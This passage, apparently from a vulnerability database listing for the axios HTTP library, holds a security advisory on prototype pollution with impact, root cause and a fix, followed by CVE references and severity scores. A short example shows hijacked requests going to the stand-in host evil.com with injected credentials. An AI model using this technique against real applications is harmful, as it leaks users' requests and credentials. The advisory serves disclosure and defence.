await axios.get('/api/users');
// Request is sent to: https://evil.com/api/users
// With header: Authorization: Basic YXR0YWNrZXI6ZXhmaWw=
// Attacker receives both the request and injected credentials
```

## Impact

- **Credential injection:** Every axios request includes an attacker-controlled `Authorization` header, leaking request contents to any server that logs auth headers.
- **Request hijacking:** All requests using relative URLs are silently redirected to an attacker-controlled server.
- **SSRF:** Requests can be redirected to internal Unix sockets, enabling container escape in Docker environments.
- **Code execution:** Attacker-supplied functions execute during HTTP redirects.
- **Parser weakening:** Insecure HTTP parser enabled on all requests, enabling request smuggling.

## Root Cause

`mergeConfig()` iterates `Object.keys({...config1, ...config2})`, which only returns own properties. When neither the defaults nor the user config sets these properties, they are absent from the merged config. The HTTP adapter then reads them via direct property access (`config.auth`, `config.socketPath`, etc.), which traverses the prototype chain and picks up polluted values.

The `own()` helper at `lib/adapters/http.js` line 336 exists and guards 8 other properties (`data`, `lookup`, `family`, `httpVersion`, `http2Options`, `responseType`, `responseEncoding`, `transport`) from this exact attack. The 5 properties listed above are not included in this protection.

## Suggested Fix

Apply the existing `own()` helper to all affected properties:

```javascript
const configAuth = own('auth');
if (configAuth) {
  const username = configAuth.username || '';
  const password = configAuth.password || '';
  auth = username + ':' + password;
}
```

Same pattern for `socketPath`, `beforeRedirect`, `insecureHTTPParser`, and a `hasOwnProperty` check for `baseURL` in `resolveConfig.js`.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42264
reference_id
reference_type
scores
0
value 0.0009
scoring_system epss
scoring_elements 0.25454
published_at 2026-06-07T12:55:00Z
1
value 0.0009
scoring_system epss
scoring_elements 0.255
published_at 2026-06-06T12:55:00Z
2
value 0.0009
scoring_system epss
scoring_elements 0.25514
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42264
1
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42264
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42264
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:10:24Z/
url https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa
5
reference_url https://github.com/axios/axios/pull/10779
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:10:24Z/
url https://github.com/axios/axios/pull/10779
6
reference_url https://github.com/axios/axios/releases/tag/v1.15.2
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:10:24Z/
url https://github.com/axios/axios/releases/tag/v1.15.2
7
reference_url https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-08T14:10:24Z/
url https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42264
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42264
9
reference_url https://github.com/advisories/GHSA-q8qp-cvcw-x6jj
reference_id GHSA-q8qp-cvcw-x6jj
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-q8qp-cvcw-x6jj
fixed_packages
0
url pkg:npm/axios@1.15.2
purl pkg:npm/axios@1.15.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-dqkm-8xjg-63hn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.2
aliases CVE-2026-42264, GHSA-q8qp-cvcw-x6jj
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rusx-pwdw-zqcj
13
url VCID-td7u-cct6-bud6
vulnerability_id VCID-td7u-cct6-bud6
summary axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json
reference_id
reference_type
scores
0
value 7.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-62718.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-62718
reference_id
reference_type
scores
0
value 0.00069
scoring_system epss
scoring_elements 0.21286
published_at 2026-06-07T12:55:00Z
1
value 0.00069
scoring_system epss
scoring_elements 0.21334
published_at 2026-06-06T12:55:00Z
2
value 0.00069
scoring_system epss
scoring_elements 0.21348
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-62718
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-62718
3
reference_url https://datatracker.ietf.org/doc/html/rfc1034#section-3.1
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://datatracker.ietf.org/doc/html/rfc1034#section-3.1
4
reference_url https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2
5
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
6
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
7
reference_url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
8
reference_url https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df
9
reference_url https://github.com/axios/axios/pull/10661
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/pull/10661
10
reference_url https://github.com/axios/axios/pull/10688
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/pull/10688
11
reference_url https://github.com/axios/axios/releases/tag/v0.31.0
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/releases/tag/v0.31.0
12
reference_url https://github.com/axios/axios/releases/tag/v1.15.0
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/releases/tag/v1.15.0
13
reference_url https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/
url https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5
14
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-62718
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-62718
15
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2456913
reference_id 2456913
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2456913
16
reference_url https://github.com/advisories/GHSA-3p68-rc4w-qgx5
reference_id GHSA-3p68-rc4w-qgx5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3p68-rc4w-qgx5
17
reference_url https://access.redhat.com/errata/RHSA-2026:10175
reference_id RHSA-2026:10175
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:10175
18
reference_url https://access.redhat.com/errata/RHSA-2026:13571
reference_id RHSA-2026:13571
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:13571
19
reference_url https://access.redhat.com/errata/RHSA-2026:13826
reference_id RHSA-2026:13826
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:13826
20
reference_url https://access.redhat.com/errata/RHSA-2026:14937
reference_id RHSA-2026:14937
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:14937
21
reference_url https://access.redhat.com/errata/RHSA-2026:16874
reference_id RHSA-2026:16874
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16874
22
reference_url https://access.redhat.com/errata/RHSA-2026:17657
reference_id RHSA-2026:17657
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17657
23
reference_url https://access.redhat.com/errata/RHSA-2026:17699
reference_id RHSA-2026:17699
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17699
24
reference_url https://access.redhat.com/errata/RHSA-2026:19375
reference_id RHSA-2026:19375
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19375
25
reference_url https://access.redhat.com/errata/RHSA-2026:19712
reference_id RHSA-2026:19712
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19712
26
reference_url https://access.redhat.com/errata/RHSA-2026:20889
reference_id RHSA-2026:20889
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20889
27
reference_url https://access.redhat.com/errata/RHSA-2026:20938
reference_id RHSA-2026:20938
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20938
28
reference_url https://access.redhat.com/errata/RHSA-2026:21017
reference_id RHSA-2026:21017
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21017
29
reference_url https://access.redhat.com/errata/RHSA-2026:22465
reference_id RHSA-2026:22465
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22465
30
reference_url https://access.redhat.com/errata/RHSA-2026:22629
reference_id RHSA-2026:22629
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22629
31
reference_url https://access.redhat.com/errata/RHSA-2026:22840
reference_id RHSA-2026:22840
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22840
32
reference_url https://access.redhat.com/errata/RHSA-2026:23361
reference_id RHSA-2026:23361
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:23361
33
reference_url https://access.redhat.com/errata/RHSA-2026:8483
reference_id RHSA-2026:8483
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8483
34
reference_url https://access.redhat.com/errata/RHSA-2026:8484
reference_id RHSA-2026:8484
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8484
35
reference_url https://access.redhat.com/errata/RHSA-2026:8490
reference_id RHSA-2026:8490
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8490
36
reference_url https://access.redhat.com/errata/RHSA-2026:8491
reference_id RHSA-2026:8491
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8491
37
reference_url https://access.redhat.com/errata/RHSA-2026:8493
reference_id RHSA-2026:8493
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8493
38
reference_url https://access.redhat.com/errata/RHSA-2026:9742
reference_id RHSA-2026:9742
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:9742
fixed_packages
0
url pkg:npm/axios@1.15.0
purl pkg:npm/axios@1.15.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4b7a-22xk-gbh9
1
vulnerability VCID-5kg1-k416-dfc1
2
vulnerability VCID-6ru1-uamj-5ud3
3
vulnerability VCID-8a5f-cd5t-mucc
4
vulnerability VCID-gp41-4j8d-37ce
5
vulnerability VCID-hadc-5d2f-gqe6
6
vulnerability VCID-jvs6-8bva-nqb3
7
vulnerability VCID-rusx-pwdw-zqcj
8
vulnerability VCID-vzqt-dj1z-bqa6
9
vulnerability VCID-xdas-dhtb-nuge
10
vulnerability VCID-xg1x-4spz-jucn
11
vulnerability VCID-yu5y-e4bk-zyfp
12
vulnerability VCID-z5pf-pqcd-ckas
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.0
aliases CVE-2025-62718, GHSA-3p68-rc4w-qgx5
risk_score 3.1
exploitability 0.5
weighted_severity 6.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-td7u-cct6-bud6
14
url VCID-vq2d-yv43-57b6
vulnerability_id VCID-vq2d-yv43-57b6
summary 
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-27152
reference_id
reference_type
scores
0
value 0.00212
scoring_system epss
scoring_elements 0.43813
published_at 2026-06-07T12:55:00Z
1
value 0.00212
scoring_system epss
scoring_elements 0.43829
published_at 2026-06-05T12:55:00Z
2
value 0.00212
scoring_system epss
scoring_elements 0.43838
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-27152
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
5
reference_url https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde
6
reference_url https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f
7
reference_url https://github.com/axios/axios/issues/6463
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/
url https://github.com/axios/axios/issues/6463
8
reference_url https://github.com/axios/axios/pull/6829
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/6829
9
reference_url https://github.com/axios/axios/releases/tag/v1.8.2
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/releases/tag/v1.8.2
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223
reference_id 1102223
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2350618
reference_id 2350618
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2350618
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-27152
reference_id CVE-2025-27152
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-27152
13
reference_url https://github.com/advisories/GHSA-jr5f-v2jv-69x6
reference_id GHSA-jr5f-v2jv-69x6
reference_type
scores
url https://github.com/advisories/GHSA-jr5f-v2jv-69x6
14
reference_url https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6
reference_id GHSA-jr5f-v2jv-69x6
reference_type
scores
0
value 7.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/
url https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6
fixed_packages
0
url pkg:npm/axios@1.8.2
purl pkg:npm/axios@1.8.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-37kj-pzyt-8be6
1
vulnerability VCID-4b7a-22xk-gbh9
2
vulnerability VCID-5kg1-k416-dfc1
3
vulnerability VCID-6ru1-uamj-5ud3
4
vulnerability VCID-8a5f-cd5t-mucc
5
vulnerability VCID-axy8-kmka-pugw
6
vulnerability VCID-gp41-4j8d-37ce
7
vulnerability VCID-hadc-5d2f-gqe6
8
vulnerability VCID-jvs6-8bva-nqb3
9
vulnerability VCID-kwj2-mk8c-4fef
10
vulnerability VCID-rusx-pwdw-zqcj
11
vulnerability VCID-td7u-cct6-bud6
12
vulnerability VCID-vzqt-dj1z-bqa6
13
vulnerability VCID-xdas-dhtb-nuge
14
vulnerability VCID-xg1x-4spz-jucn
15
vulnerability VCID-yu5y-e4bk-zyfp
16
vulnerability VCID-z5pf-pqcd-ckas
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.8.2
aliases CVE-2025-27152, GHSA-jr5f-v2jv-69x6
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vq2d-yv43-57b6
15
url VCID-vzqt-dj1z-bqa6
vulnerability_id VCID-vzqt-dj1z-bqa6
summary axios: Axios: Arbitrary HTTP header injection via prototype pollution
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42035.json
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42035.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42035
reference_id
reference_type
scores
0
value 0.00047
scoring_system epss
scoring_elements 0.15145
published_at 2026-06-07T12:55:00Z
1
value 0.00047
scoring_system epss
scoring_elements 0.15195
published_at 2026-06-05T12:55:00Z
2
value 0.00047
scoring_system epss
scoring_elements 0.15185
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42035
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42035
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42035
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T18:07:43Z/
url https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42035
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42035
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2461606
reference_id 2461606
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2461606
8
reference_url https://github.com/advisories/GHSA-6chq-wfr3-2hj9
reference_id GHSA-6chq-wfr3-2hj9
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6chq-wfr3-2hj9
9
reference_url https://access.redhat.com/errata/RHSA-2026:14937
reference_id RHSA-2026:14937
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:14937
10
reference_url https://access.redhat.com/errata/RHSA-2026:16476
reference_id RHSA-2026:16476
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16476
11
reference_url https://access.redhat.com/errata/RHSA-2026:16532
reference_id RHSA-2026:16532
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16532
12
reference_url https://access.redhat.com/errata/RHSA-2026:16534
reference_id RHSA-2026:16534
reference_type
scores
